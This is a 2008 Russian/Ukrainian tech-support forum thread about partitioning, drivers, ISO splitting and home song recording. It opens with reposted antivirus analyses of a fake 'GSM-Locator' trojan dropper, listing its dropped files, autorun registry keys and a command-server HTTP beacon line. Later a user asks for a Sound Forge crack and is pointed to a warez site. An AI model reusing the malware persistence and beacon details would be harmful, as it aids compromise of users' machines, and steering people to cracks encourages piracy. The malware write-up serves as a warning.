Просмотр полной версии : Тех. Помощь тут ==>>
Кто знаит чтото о такой проге как GSM Locator? Типо вводиш номер симки а тибе выдает место росполажения тела. а соотвецтвено и ёго владельца? Мне друг говорил что у него была ссылка на такой сайт%\ Сёня юзал гуглю нифига ненашол толкового. Кто что подскажет, есть ли такой сайт?
dima_stalker.net
13.04.2008, 22:48
Кто знаит чтото о такой проге как GSM Locator? Типо вводиш номер симки а тибе выдает место росполажения тела. а соотвецтвено и ёго владельца? Мне друг говорил что у него была ссылка на такой сайт%\ Сёня юзал гуглю нифига ненашол толкового. Кто что подскажет, есть ли такой сайт?
GSM-Locator - очередная приманка для неосторожных пользователей
Служба вирусного мониторинга компании «Доктор Веб» сообщает о распространении по сети Интернет новой разновидности троянской программы, получившей название Trojan.MulDrop.1287.
Наверняка многие пользователи русскоязычного сегмента всемирной сети прельстились заманчивой возможностью загрузить на свою машину в виде исполняемого файла gsm-locator v1.05.exe программку, якобы дающую возможность - ни много, ни мало - определить местонахождение звонящего с мобильного телефона в России и даже местонахождение абонента, если подключена карта города.
Такую возможность предоставляет, если верить распространенному спам-рассылкой письму, версия 1.05 "уникальной" программы GSM-Локатор. По словам ее создателей, точность определения составляет - 10-20 метров (!), в зависимости от плотности расположения ретрансляторов оператора связи.
Как уверяет сопровождающее ссылку письмо, программа рассчитана на 24 часа полноценной работы с момента запуска. И поверьте, что если вас заинтересует подобный сервис и вы выполните рекомендуемые действия, то троянской программе Trojan.MulDrop.1287, которую вы таким образом загрузите на свой компьютер, потребуются доли секунд для покорения вашей системы и превращения вашего персонального компьютера в легкодоступную игрушку для злоумышленников.
Маскирующаяся под видом безобидной и столь "нужной" утилиты классическая троянская программа может нанести немалый вред неосторожному пользователю, причем есть высокая вероятность того, что сам пользователь этот вред очень долго не обнаружит. Поникнув в незащищенную антивирусной программой систему, троянец сбрасывает на диск 5 файлов, которые запускаются один за другим и устанавливают на пораженной машине прокси-сервер, который либо позволит рассылать через нее спам, либо выполнять другие действия, предусмотренные создателем троянца. А что может быть дальше - только фантазия автора вируса ограничивает круг его действий. Вдобавок, новый троянец стирает все файлы из папок Temporary Internet Files и Cookies.
Появление подобных программ, рассчитанных, в первую очередь, на неискушенных домашних пользователей, чьи компьютеры легко становится машинами-зомби и пополняют всемирную паутину серверов для рассылки спама, лишний раз подтверждает тот факт, что инвестиции в собственную защиту, в защиту тайны личной информации в виде надежной антивирусной программы стоят гораздо дешевле, чем предлагаемая опасная игрушка. А стремление получить что-либо очень привлекательное из Интернета, да еще и бесплатно всегда чревато появлением на вашем компьютере незваных гостей.
Определение местоположения сотового телефона Предлагаем уникальные программные комплексы для определения местоположения сотового телефона по его номеру, а также перехвату sms.
Теперь Вы всегда будете знать где Ваши сотрудники (жена/муж/ребенок) GSM - Locator Предлагаемая нами программа это DEMO (демонстрация возможностей), ограниченная в работе на 30 дней. Полноценную версую программы Вы можете купить в офисе нашей компании (вся информация по регистрации на вкладке программы). DEMO-версия программы прилагается к письму, для её использования достаточно запустить и ввести номер искомого Вами абонента. Имеется возможность подгрузки необходимых карт с нашего сервера.
Если к Вам придёт такое письмо, то читайте дальше. И после поиска в интернете было найдено: К письму приложен файл GSM - Locator v1.05.exe размером 137216 байт. Файл ничем не сжат, написан на Delphi. Касперский опознает его как Trojan-Dropper.Win32.~Delf.fr. По экспресс-анализу он и является дроппером, т.к. его задачей является помещение на компьютер нескольких троянов. В результате на компьютере в папке System появляется ряд файлов: mstasks.exe - 43520 байт, TrojanDropper.Win32.Small.ne (в хвосте этого файла есть еще один) sdchost.exe - 7004 байта, TrojanDownloader.Win32.Small.ub sdchostc.exe - 12000 байта, сжат UPX, TrojanProxy.Win32.Daemonize.ab sdchosts.exe - 17000 байта, сжат UPX, TrojanProxy.Win32.Daemonize.ab sorte32.dll - 4000 байт, сжата UPX, TrojanDownloader.Win32.Small.ua Стоит заметить, что все это "зверье" хранится внутри GSM - Locator v1.05.exe (они приписаны в хвост) В ключе Run появляется две записи для автозагрузкит троянов: "mstasks"="C:WINDOWSSYSTEMmstasks.exe" "Direct settings"="C:WINDOWSSYSTEMsdchost.exe" проявлением трояна является обмен с сайтом zsewaq3211.infobox.ru вида, который идет с периодически: GET http://zsewaq3211.infobox.ru/script/command.php?IP=172.20.107.28&Port1=12120&Port2=121 22&ID=002900112004000700470030&L1=-.gif&L2=- HTTP/1.0..User-Agent: ..Host: zsewaq3211.infobox.ru
Вывод: таких программ не существует, таким способом распространяют вирусы - это не мои слова , а слова статьи
Profffesor
15.04.2008, 13:47
Помогите пожалуйста,хочу зделать простой логический диск на 70ГБ из 20 и 50ГБ разделов.Что делать?:confused:
AndRey Wild Cat
15.04.2008, 15:04
Помогите пожалуйста,хочу зделать простой логический диск на 70ГБ из 20 и 50ГБ разделов.Что делать?:confused:
Любим патішн меджиком...
Profffesor
15.04.2008, 15:43
Дякую.
В кого є Аська або квіп на СЕ к750і ? Або де можна нормальну скачати, і якшо хтось знає, допоможіть її(його) настроїти :)
-F&W-Anikei[Sev]
15.04.2008, 17:31
В кого є Аська або квіп на СЕ к750і ? Або де можна нормальну скачати, і якшо хтось знає, допоможіть її(його) настроїти :)
www.jimm.org/download/
c мобильного
А як настроїти її? хтось знає? а то воно пише "Требуемое TCP соидинение неосуществимо (#118.0) а потом (#125.1) " Шо мені робить ? :confused:
AndRey Wild Cat
15.04.2008, 20:40
В кого є Аська або квіп на СЕ к750і ? Або де можна нормальну скачати, і якшо хтось знає, допоможіть її(його) настроїти :)А як настроїти її? хтось знає? а то воно пише "Требуемое TCP соидинение неосуществимо (#118.0) а потом (#125.1) " Шо мені робить ? :confused:
ю_за_ЄМО пошук (http://forum.vn.ua/showthread.php?t=6549) :yes:
Маленьке біляве стерво
15.04.2008, 21:21
ю_за_ЄМО пошук (http://forum.vn.ua/showthread.php?t=6549) :yes:
ты как обычно мочишь :yes:
Profffesor
16.04.2008, 00:08
А что означает Оperation curenly pending?Когда пролелал все операции с дисками,мне Партишн меджик пишет ту вот фразу,я жму Aplly,и оно перезагружает ПК 2 раза,но ничего не меняется.:(
А что означает Оperation curenly pending?Когда пролелал все операции с дисками,мне Партишн меджик пишет ту вот фразу,я жму Aplly,и оно перезагружает ПК 2 раза,но ничего не меняется.:(
у тебя эти разделы физически один винт?
мож они разных файловых систем, то ано и матюкаецца
папробуй всьо в адну ку ю то форматнуть если шо, а патом уже лепи их вместе:confused:
Profffesor
16.04.2008, 11:34
у тебя эти разделы физически один винт?
мож они разных файловых систем, то ано и матюкаецца
папробуй всьо в адну ку ю то форматнуть если шо, а патом уже лепи их вместе:confused:
То и дело,что это всё ОДИН винт.Насчёт файловых систем-посмотри пожалуйста тут http://www.forum.vn.ua/showpost.php?p=2306655&postcount=7266 скрин 20 и 50ГБ пустих мест.20 ГБ кусок образован в результате уменьшения НТФС диска,а 50 ГБ-в результате удаления другого НТФС диска.
Что за ошибка при включении компа ?
То и дело,что это всё ОДИН винт.Насчёт файловых систем-посмотри пожалуйста тут http://www.forum.vn.ua/showpost.php?p=2306655&postcount=7266 скрин 20 и 50ГБ пустих мест.20 ГБ кусок образован в результате уменьшения НТФС диска,а 50 ГБ-в результате удаления другого НТФС диска.
так у тебя тот шо на 50 не распределен и не отформатирован( ты его как бэ удалил партишеном)
нада иво апядь саздать и форматнуть в нтфс, далжно слепицца:)
-F&W-Anikei[Sev]
16.04.2008, 17:25
Что за ошибка при включении компа ?
какая-то прога с запускным файлом mom.exe у тебя херово установлена. переустанови приложение. или найди нормальный инсталл.
;2307115']какая-то прога с запускным файлом mom.exe у тебя херово установлена. переустанови приложение. или найди нормальный инсталл.
а чеж эта за хрень мом.ексе я тока винду переустановил и дрова поставил и все.
а чеж эта за хрень мом.ексе я тока винду переустановил и дрова поставил и все.
пагугли:|
;2307115']какая-то прога с запускным файлом mom.exe у тебя херово установлена. переустанови приложение. или найди нормальный инсталл.
пагугли:|
лан спасибо. попробуем чета зделать
James Bond
16.04.2008, 22:11
лан спасибо. попробуем чета зделать
mom.exe – процесс, принадлежащий ATI catalyst control center начиная с версии 7.2. mom.exe отвечает за работу драйверов видеокарты и не представляет риска безопасности вашей системы.
Также под именем mom.exe распространяется шпионская программа Spyware.Mom, которая периодически делает снимки экрана пользователя. Шпионская программа всегда расположена в каталоге %ProgramFiles%\mom\. В случае обнаружения такого файла он должен быть немедленно удален.
mom.exe – процесс, принадлежащий ATI catalyst control center начиная с версии 7.2. mom.exe отвечает за работу драйверов видеокарты и не представляет риска безопасности вашей системы.
Также под именем mom.exe распространяется шпионская программа Spyware.Mom, которая периодически делает снимки экрана пользователя. Шпионская программа всегда расположена в каталоге %ProgramFiles%\mom\. В случае обнаружения такого файла он должен быть немедленно удален.
о спасибо ну шпионская программа у меня врядле а вот catalyst control center какарас оно ток хз че оно ошибку выдает
Пушистик
16.04.2008, 22:36
Люди пАмАгитЕ плЬ)z вообщем Я мнУю кАмп на ноУтЬ а дРоф нетЬ на МодЕм ARRIS есть т0к UNistal! что делать? Можь кто-то можЕт скинуть Инсталяшку? Плзззз 04ень над0...))
о спасибо ну шпионская программа у меня врядле а вот catalyst control center какарас оно ток хз че оно ошибку выдает
сделай так..
скачай любой примитивный редактор системного реестра..(я советую RegCleaner)
найди пункт автозагрузка..
в нем удали этот мом...
все элементарно..
зодно почистишь автозапуск от лишнего хлама..
Люди пАмАгитЕ плЬ)z вообщем Я мнУю кАмп на ноУтЬ а дРоф нетЬ на МодЕм ARRIS есть т0к UNistal! что делать? Можь кто-то можЕт скинуть Инсталяшку? Плзззз 04ень над0...))
Кабельные модемы ARRIS Touchstone Cable Modem CM450A и CM550A
Документация и драйвера для CM450A, CM550AUSB Драйвер для CM450AСкачать (http://www.smart.vn.ua/free_dl/CM450xUSBDriversv4.0.0.zip)
USB Драйвер для CM550AСкачать (http://www.smart.vn.ua/free_dl/CM550xUSBDriversv4.0.0.zip)
USB Драйвер для CM450A,
CM550A Vista только 64-bitСкачать (http://www.smart.vn.ua/free_dl/arris_windows_vista64.zip)
James Bond
16.04.2008, 22:40
httР://www.sМart.vn.ua/rus/suРport/cabmОd.htМl#cm450
Пушистик
16.04.2008, 22:56
Я скачал, и что?там даже нет файла с розширением .exe
Пушистик
16.04.2008, 23:12
Люди!!!! как мне и что делать? По о4ереди Если м0нЯ)))плЗЗЗ
Такая-вот проблемка: в момент отсутствия работоспособного антивируса подцепилось несколько вирусняков. Основным последствием этого стала невозможность заходить на большое количество сайтов,в том числе и поисковые системы. Так что я оказался практически парализован. Благо,форум хоть работает. Сегодня установил НОД и все дерьмо поудалял. Переустановил и Оперу,которая является единственным браузером на компе, - но проблем с интернетом все же осталась. Скажи,если кто знает: есть ли способ заставить работать интернет,как прежде,не переустанавливая винду?
Magnetto
17.04.2008, 09:29
Такая-вот проблемка: в момент отсутствия работоспособного антивируса подцепилось несколько вирусняков. Основным последствием этого стала невозможность заходить на большое количество сайтов,в том числе и поисковые системы. Так что я оказался практически парализован. Благо,форум хоть работает. Сегодня установил НОД и все дерьмо поудалял. Переустановил и Оперу,которая является единственным браузером на компе, - но проблем с интернетом все же осталась. Скажи,если кто знает: есть ли способ заставить работать интернет,как прежде,не переустанавливая винду?
покажи плз содержимое
C:\WINDOWS\system32\drivers\etc\hosts
возможно вирусня перенаправила поисковые системы на несуществующий адрес
покажи плз содержимое
C:\WINDOWS\system32\drivers\etc\hosts
возможно вирусня перенаправила поисковые системы на несуществующий адрес
Показать именно hosts или папку etc?
Вот содержимое etc(пишу вручную,так как ни одной программы редактирования фото нету,потому не могу сделать скрин):
hosts
lmhosts.sam
networks
protocol
services
А вот hosts:
# (C) Корпорация Майкрософт (Microsoft Corp.), 1993-1999
#
# Это образец файла HOSTS, используемый Microsoft TCP/IP для Windows.
#
# Этот файл содержит сопоставления IP-адресов именам узлов.
# Каждый элемент должен располагаться в отдельной строке. IP-адрес должен
# находиться в первом столбце, за ним должно следовать соответствующее имя.
# IP-адрес и имя узла должны разделяться хотя бы одним пробелом.
#
# Кроме того, в некоторых строках могут быть вставлены комментарии
# (такие, как эта строка), они должны следовать за именем узла и отделяться
# от него символом '#'.
#
# Например:
#
# 102.54.94.97 rhino.acme.com # исходный сервер
# 38.25.63.10 x.acme.com # узел клиента x
127.0.0.1 localhost
Magnetto
17.04.2008, 14:16
127.0.0.1 localhost
нет , не в этом трабл (
нет , не в этом трабл (
Ясно... Наверное буду винду переустанавливать)))
Спасибо.
Пушистик
17.04.2008, 15:00
Люди помогите,скачал дрова на свой модем а там даж нету Инсталяцыи! Что мне сделать и как настроить инет
Profffesor
17.04.2008, 15:11
Мой компютер-свойства-оборудование-диспетчер устройств-сетевые усторйства,находиш свой модем(он должен быть выелен знаком восклицания),открываеш вкладку-драйвера-обновить-указываеш папку с дровами-юзаеш инет!
Интересует вопрос: чем\как можно разбить iso образ на сегменты? Допустим 6 гиг разбить на 4.7 и 1.3 что бы записать на две двд. (Исключая архиваторы, а то потом с ними надо мозги парить, разархивировать на комп.. и с компа установить, слишком много места... которого и так нету) Кто-то может чет посоветовать?
Юзал Power ISO одним словом полова, урезаные образы надо соеденять этой же прогой, и только после этого устанавливать.
Интересует вопрос: чем\как можно разбить iso образ на сегменты? Допустим 6 гиг разбить на 4.7 и 1.3 что бы записать на две двд. (Исключая архиваторы, а то потом с ними надо мозги парить, разархивировать на комп.. и с компа установить, слишком много места... которого и так нету) Кто-то может чет посоветовать?
Юзал Power ISO одним словом полова, урезаные образы надо соеденять этой же прогой, и только после этого устанавливать.
Алкоголь 120% при створені образу там можна вибирати розмір на який хочеш розбити.
НТФС и флэшка (8 Гб)...
Насколько совместимы эти два понятия?
Будет ли Флэшка писать/читать быстрее, если её отформатировать в НТФС?
Насколько лучше она будет функционировать?
НТФС и флэшка (8 Гб)...
Насколько совместимы эти два понятия?
Будет ли Флэшка писать/читать быстрее, если её отформатировать в НТФС?
Насколько лучше она будет функционировать?
зависит от размера кластера, в идеале для этого объема - 1КБ, естественно, нтфс лучше, он меньше реагирует на неправильно извлечение носителя, хотя, самый идеал - рейзерфс
Profffesor
18.04.2008, 15:54
Помогите,хто знает?
Profffesor
18.04.2008, 17:08
А таже по етому.
Помогите,хто знает?
в виндовом администрировании удали разделы, а потом создай большой.....данные будут утеряны, но восстановить можно
Profffesor
18.04.2008, 17:21
http://www.forum.vn.ua/showpost.php?p=2306655&postcount=7266
Все?:eek:
http://www.forum.vn.ua/showpost.php?p=2306655&postcount=7266
Все?:eek:кто так учил размечать винчестер? О_О
Profffesor
18.04.2008, 17:32
кто так учил размечать винчестер? О_О
Я вообще-то самоучка.И поетому,напиши пожалуйста,что неправильно.
Алкоголь 120% при створені образу там можна вибирати розмір на який хочеш розбити.
Дак у меня образ уже создан, его просто-на-просто разделить надо...
Дак у меня образ уже создан, его просто-на-просто разделить надо...
:rolleyes: ну готовий я не знаю як можна розділити. легше змонтуй цей який в тебе є. і створи алкоголем з нього розбитий
bluesandbehemoth
19.04.2008, 16:21
такой вопрос : купил я новый винт, к нему карман, усё вставил - не работает. Люди говорят, что нужно форматнуть винт и разбить на тома с помощью Партишина. Как это всё сделать?%\
-F&W-Anikei[Sev]
19.04.2008, 16:32
такой вопрос : купил я новый винт, к нему карман, усё вставил - не работает. Люди говорят, что нужно форматнуть винт и разбить на тома с помощью Партишина. Как это всё сделать?%\
обычно при установке винды сервисная служба может это сделать....
или это запасной винт?
так в мене таке питання: як можна підключити SATA-вінт, до ПК в якому SATA нема?
так в мене таке питання: як можна підключити SATA-вінт, до ПК в якому SATA нема?pci-sata контроллер, или usb-to-ide\sata
такой вопрос : купил я новый винт, к нему карман, усё вставил - не работает. Люди говорят, что нужно форматнуть винт и разбить на тома с помощью Партишина. Как это всё сделать?%\Панель управления - Администрирование - Управление компьютером - Дисковые устройства, выбираешь винт, создаешь разделы, я без партишна обхожусь уже года 1,5, хватает стандартных средств той или иной оси.
pci-sata контроллер, или usb-to-ide\sata
Вони погані....не всі вінти бачать(максимум на 200Гб).....а про це докладніше, шо це таке і шось я такого не бачив....
Вони погані....не всі вінти бачать(максимум на 200Гб).....а про це докладніше, шо це таке і шось я такого не бачив....
по-моему, название говорит само за себя, грубо говоря, переходник с иде и сата на юсб, недокарман типа.........http://www.virtuavia.eu/shop/index.php?target=products&product_id=29796&sl=EN - типа вот
bluesandbehemoth
19.04.2008, 18:05
;2308318']обычно при установке винды сервисная служба может это сделать....
или это запасной винт?
Это вообще карман. Говорю же - вставил карман с НОВЫМ винтом, а виндовс его просто не видит:rolleyes:
по-моему, название говорит само за себя, грубо говоря, переходник с иде и сата на юсб, недокарман типа.........http://www.virtuavia.eu/shop/index.php?target=products&product_id=29796&sl=EN - типа вот
спс....ше б його найти в нас......а кармани є зовнішні, вони нармальні?......такого тіпа:http://www.serviceplus.com.ua/index.php?menu=Product&prodid=1087&parid=28
спс....ше б його найти в нас......а кармани є зовнішні, вони нармальні?......такого тіпа:http://www.serviceplus.com.ua/index.php?menu=Product&prodid=1087&parid=28 такие переходники есть на многих фирмах, насчет карманов 3,5 - хз, не юзал, у меня все винты 2,5''.
Ребят, срочно нужен номер СИТИ. Где взять?
Werewolf
19.04.2008, 22:52
Ребят, срочно нужен номер СИТИ. Где взять?
Это ?
Студія-бар CITY
Години роботи: з 12.00 до 2.00
вул. Хмельницьке шосе, 85 Тел.: 52-33-19
AndRey Wild Cat
19.04.2008, 22:58
такой вопрос : купил я новый винт, к нему карман, усё вставил - не работает. Люди говорят, что нужно форматнуть винт и разбить на тома с помощью Партишина. Как это всё сделать?%\А інший вінт поменьше в кармані бачиться? Боя раз купив несправний карман... Вінда за 2 дні так і не побачила... прийшов на фірму, обміняв на робочий. :yes:
А інший вінт поменьше в кармані бачиться? Боя раз купив несправний карман... Вінда за 2 дні так і не побачила... прийшов на фірму, обміняв на робочий. :yes:
если на винте нет разделов, то он будет отображаться только в диспетчере устройств.
-F&W-Anikei[Sev]
19.04.2008, 23:08
Это вообще карман. Говорю же - вставил карман с НОВЫМ винтом, а виндовс его просто не видит:rolleyes:
хмм... я бы поставил его как основной и поставил бы диск с загрузочной виндой, где есть служебные программы... вместе с Партишеном.
мб можно сделать и проще...я хз..
AndRey Wild Cat
19.04.2008, 23:09
если на винте нет разделов, то он будет отображаться только в диспетчере устройств.Ну це мало по замовчуванню :yes:
;2308411']хмм... я бы поставил его как основной и поставил бы диск с загрузочной виндой, где есть служебные программы... вместе с Партишеном.
мб можно сделать и проще...я хз..обычно винт ставится в карман, если ты его часто достаешь, сата можно хотплагом доставать, в кайф мучать винт с активным разделом, доставая его по-горячему?
Ну це мало по замовчуванню :yes:
:confused: хз, у меня 2,5'' работают в карманах отлично, а насчет 3,5'' - хз, для меня они уже не существуют, большие и неудобные...
-F&W-Anikei[Sev]
20.04.2008, 01:32
обычно винт ставится в карман, если ты его часто достаешь, сата можно хотплагом доставать, в кайф мучать винт с активным разделом, доставая его по-горячему?
Не сдохнет:|
;2308456']Не сдохнет:|:lol: знавець.....поставь винду на винт в кармане, достань его на ходу, и узнай правду, а не говори, не проверяя
w_i_n_d_y
20.04.2008, 12:11
Ррррррррррееебятааааааааааа. срочно нужен кряк под саунд форж 5!
нигде не могу найти, начинаю чувствовать себя полным дЭбИлОм!%\%\%\
www.mskd.ru и в аптеку. и заходи осликом :d
всем приветнужен русик на IE 8 (beta 1):yes:
gon_zalez
20.04.2008, 15:19
Подскажите плиз какие есть проги для просмотра RAW файлов, мож какието организатофы файлов.
всем приветнужен русик на IE 8 (beta 1):yes:
русика не надо, есть русский 8 осел ->>>>> http://www.mydigitallife.info/2008/03/06/download-internet-explorer-8-ie8-beta-1-direct-microsoft-server-links/ru/
Подскажите плиз какие есть проги для просмотра RAW файлов, мож какието организатофы файлов.
плагины для фотошопа, лайтрум
Подскажите плиз как в Неро Вейв едитор вырезать из песни кусочки и сохранять отдельными файлами... плиз очень нуно)
Подскажите плиз как в Неро Вейв едитор вырезать из песни кусочки и сохранять отдельными файлами... плиз очень нуно)
выделяешь начало и конец куска, а потом сохраняешь в отдельный файл
выделяешь начало и конец куска, а потом сохраняешь в отдельный файл
Спасибо)
русика не надо, есть русский 8 осел ->>>>> http://www.mydigitallife.info/2008/03/06/download-internet-explorer-8-ie8-beta-1-direct-microsoft-server-links/ru/
спасиб :)
bluesandbehemoth
22.04.2008, 16:13
2 Ortega
Спасибо за совет!! Диспетчиром устройств и отформатировал и разбил на тома - Microsoft даже чуть поднялся в моих глазах :)
Luchano Frost
22.04.2008, 17:36
ДЛя перегляду RAW використовую ACDSeePro2
ДЛя редагування - ФОтошопи з плагінами Camera RAW для різних версій фотошопа
Lestatid
22.04.2008, 17:44
Помогите найти дрова на джостик Logitech ChillStream! Плз, оч надо... ;)
ДЛя перегляду RAW використовую ACDSeePro2
ДЛя редагування - ФОтошопи з плагінами Camera RAW для різних версій фотошопаасидиси не все варианты роу читает
Помогите найти дрова на джостик Logitech ChillStream! Плз, оч надо... ;)
http://www.logitech.com/index.cfm/441/292&cl=ru,ru
Lestatid
22.04.2008, 17:58
http://www.logitech.com/index.cfm/441/292&cl=ru,ru
думаешь я там небыл? дай мне лучше ссылку на дрова под ХР...
думаешь я там небыл? дай мне лучше ссылку на дрова под ХР...
надо там не быть, а прочитать, что там написано.
Lestatid
22.04.2008, 18:46
надо там не быть, а прочитать, что там написано.
я прочитал, и что дальше?
я прочитал, и что дальше?
устанавливай, человек знает, что предлагает!:yes:
я прочитал, и что дальше?то, что драйверов под икс-пи нет, а под висту их не надо.
Lestatid
22.04.2008, 22:34
то, что драйверов под икс-пи нет, а под висту их не надо.
это я прочитал...
но к джостику диск с дровами прилагался, но он был утерян! как только вставляешь джостик - оно запрашивает установку драйвера! я вот незнаю что делать! скачал какую-то муть с сайта Майкрософт, но она не пашет! :cry:
Lestatid
22.04.2008, 22:35
устанавливай, человек знает, что предлагает!:yes:
а, собственно, что устанавливать? :confused:
Werewolf
23.04.2008, 14:34
У меня проблемка(((
переустановили винду,все как надо дрова проги и т.д.
и когда пытаюсь зайти на лок диск С или Е пиет
t.com отправлять отчёт,а на лок. С такого нет что делать?
У меня проблемка(((
переустановили винду,все как надо дрова проги и т.д.
и когда пытаюсь зайти на лок диск С или Е пиет
t.com отправлять отчёт,а на лок. С такого нет что делать?
скринов наатачь
Werewolf
23.04.2008, 14:49
скринов наатачь
всё спс уже настроил,там какая то лишняя прога в месте с виндой установилась,Т.сом типа файрвола какого-то)))
Допоможіть, пліз, як підключити модем Motorola SURFboard SB5100 и SB5101 до ПК за допомогою сетевого кабелю.:confused:
Допоможіть, пліз, як підключити модем Motorola SURFboard SB5100 и SB5101 до ПК за допомогою сетевого кабелю.:confused:
договор переоформил на мак-адрес сетевушки?
договор переоформил на мак-адрес сетевушки?
А де знайти мак-адрес?
telltale
24.04.2008, 10:30
А де знайти мак-адрес?
В командной строке выполни :
ipconfig /all
Physical Address - будет твой мак-адрес.
В командной строке выполни :
ipconfig /all
Physical Address - будет твой мак-адрес.
Дуже дякую.:)
прошу помочь со следующим: есть комп и есть минусовки на этом компе, что еще надо и каким образом записать под минусовки песню. заранее благодарен
AndRey Wild Cat
25.04.2008, 00:05
прошу помочь со следующим: есть комп и есть минусовки на этом компе, что еще надо и каким образом записать под минусовки песню. заранее благодарен
Программа для багато трекового запису, і дивлячись у чому мінусовка... :yes:
Программа для багато трекового запису, і дивлячись у чому мінусовка... :yes:
минус в МП3, а знаешь название такой программы?
минус в МП3, а знаешь название такой программы?
Adobe Audition 3 (можно скачать с cjzone.ru)
очень простая удобная и гениальная прогармма...
записывать в каком стиле будете?
для начала надо настроить микрофон...кароч ща статейку найду
В первую очередь нужен многодорожечный звуковой редактор. То есть программа для работы со звуком,где можно свести минус и акаппеллу (вокал). Посоветую лично Adobe Audition,так как мне он кажется самым простым и доступным для новичка. Есть три версии,но можно качать и самую первую,которая почти ничем не отличается,но меньше весит. Например,вот. http://infostore.org/info/4207072
Этого пока будет достаточно.
Ну и,естественно,микрофон,который,надеюсь,имеется.
А вообще,песня для чего (для себя или друзей\для фильма\демо для профф деятельности)?
Adobe Audition 3 (можно скачать с cjzone.ru)
очень простая удобная и гениальная прогармма...
записывать в каком стиле будете?
для начала надо настроить микрофон...кароч ща статейку найду
угу. спс. надо самодеятельность записать .... а умения никакого. :confused:
В первую очередь нужен многодорожечный звуковой редактор. То есть программа для работы со звуком,где можно свести минус и акаппеллу (вокал). Посоветую лично Adobe Audition,так как мне он кажется самым простым и доступным для новичка. Есть три версии,но можно качать и самую первую,которая почти ничем не отличается,но меньше весит. Например,вот. http://infostore.org/info/4207072
Этого пока будет достаточно.
Ну и,естественно,микрофон,который,надеюсь,имеется.
А вообще,песня для чего (для себя или друзей\для фильма\демо для профф деятельности)?
микрофон? а тот который с камерой я в скайпе использую подойдет? (сори за нелепые вопросы, но когда не знаю предпочитаю спрашивать) .... песня для художественной самодеятельности (нечто типа КВН) , т.е. особого качества звучания не требуется, но и совсем плохое тож не приветствуется
микрофон? а тот который с камерой я в скайпе использую подойдет? (сори за нелепые вопросы, но когда не знаю предпочитаю спрашивать) .... песня для художественной самодеятельности (нечто типа КВН) , т.е. особого качества звучания не требуется, но и совсем плохое тож не приветствуется
Я не знаю,какой это,но подозреваю,что не самый лучший вариант))) Ну я не знаю,если особо звучания не требуется,то нужно хотя бы пробовать звук на записи,пойдет ли он. Конечно,желательно,чтоб это был микрофон хотябы за гривен 100,но для одной песни можно и обойтись. Но если где-то под боком есть у кого-то одолжить микрофон хотябы для караоке,то лучше взять его...
В общем,первым делом нужно выкачать программу,а потом будет видно.
микрофон? а тот который с камерой я в скайпе использую подойдет? (сори за нелепые вопросы, но когда не знаю предпочитаю спрашивать) .... песня для художественной самодеятельности (нечто типа КВН) , т.е. особого качества звучания не требуется, но и совсем плохое тож не приветствуетсяболее чем...
http://rurap.ru/uploads/rec_and_edvancer%28rurap.ru%29.rar
В общем,первым делом нужно выкачать программу,а потом будет видно.
угу. спс. сейчас и займусь .....песня не одна, но их и не много ....
более чем...
спс :good:
Я не знаю,какой это,но подозреваю,что не самый лучший вариант))) Ну я не знаю,если особо звучания не требуется,то нужно хотя бы пробовать звук на записи,пойдет ли он. Конечно,желательно,чтоб это был микрофон хотябы за гривен 100,но для одной песни можно и обойтись. Но если где-то под боком есть у кого-то одолжить микрофон хотябы для караоке,то лучше взять его...
зачем глупость подсказывать?не знаешь молчи..
у караоке спектр частот урезан НАМНОГО Больше чем у наушников с микро..да и частота дискредитации намного хуже...
писец..ЗАЧЕМ БОЛТАТЬ О ТОМ ЧЕНГО НЕ ЗНАЕШЬ?
учи матчасть!
2 Борода
не слушай..человек не шарит про что говорит....
мы писались на обычных ушах Cosonic..
если интересует качество..то прошу на сайт http://zz.all.dj
в раздел Rap/Hip-hop
у караоке спектр частот урезан НАМНОГО Больше чем у наушников с микро..да и частота дискредитации намного хуже...
учи матчасть!
2 Борода
в раздел Rap/Hip-hop
спс. я все перечитаю посмотрю, а потом и писать попробую
более чем...
Вообще-то в этой статье описывается обработка вокала при наличии Adobe Audition,Acid,Waves,а это геморойно собрать и устанавливать,потому лучше обойтись первым вариантом. Я чуть позже выложу другую статейку,где коротко описана обработка в Аудишине.
Вообще-то в этой статье описывается обработка вокала при наличии Adobe Audition,Acid,Waves,а это геморойно собрать и устанавливать,потому лучше обойтись первым вариантом. Я чуть позже выложу другую статейку,где коротко описана обработка в Аудишине.
за любую помощь, доброе слово - огромное спс от четырехсот человеческого коллектива :yes:
спс. я все перечитаю посмотрю, а потом и писать попробую
долго писать....я на каком то форуме уже обьяснял весь процесс записи от а до я...
ну вообщем...
что самое главное...
1.тишина в комнате
2.микро на голову(с наушниками)-минус в наушники а не через КАЛЛонки
3.в адобе нужно открыть мультисессию...загрузить впервую дорожку минус..а навторой нажать запись..
и делать дубли...потом выбрать который лучше полушился...остальные удалить...
предварительно надо в системном микшере в виндовс...выбрать вкладку запись(в звуке)..и там уже выбрать устройство микрофон, а не стереомикс как обычно стоит..
потом начать делать пробу..поставить усиление микро(micro boost)и опускать уровень до тех пор пока волна записываемой аккапеллы..будет нижепикового значения в 0 db и не будет шкалить...
3.после записи основного тескта можно сделать бек вокал...(если он требуется)
4.подогнать уровень громкости...чтобы голос немного превосходилпо уровню минус..т.к. микро слабый-это искустенно создает еффект нормального качества...
.5 кинуть немного дилея..т.е ехо...если требуется..но лучше ограничется стидийным ривербом..тож не переборщить с ним...
далее...просто превести микс..в мп3(с битрейтом 256 кб/с)
я все оч упростил...но если нужно добиться немного плотнее звучания..и качества..можно повешать переведенный микс на vst- Izotope Ozone и подогнать с помощью встроенных плагин..или даж примитивно по готовым пресетам...
удачи в начинаниях!
долго писать....я на каком то форуме уже обьяснял весь процесс записи от а до я...
ну вообщем...
что самое главное...
1.тишина в комнате
2.микро на голову(с наушниками)-минус в наушники а не через КАЛЛонки
3.в адобе нужно открыть мультисессию...загрузить впервую дорожку минус..а навторой нажать запись..
и делать дубли...потом выбрать который лучше полушился...остальные удалить...
предварительно надо в системном микшере в виндовс...выбрать вкладку запись(в звуке)..и там уже выбрать устройство микрофон, а не стереомикс как обычно стоит..
потом начать делать пробу..поставить усиление микро(micro boost)и опускать уровень до тех пор пока волна записываемой аккапеллы..будет нижепикового значения в 0 db и не будет шкалить...
3.после записи основного тескта можно сделать бек вокал...(если он требуется)
4.подогнать уровень громкости...чтобы голос немного превосходилпо уровню минус..т.к. микро слабый-это искустенно создает еффект нормального качества...
.5 кинуть немного дилея..т.е ехо...если требуется..но лучше ограничется стидийным ривербом..тож не переборщить с ним...
далее...просто превести микс..в мп3(с битрейтом 256 кб/с)
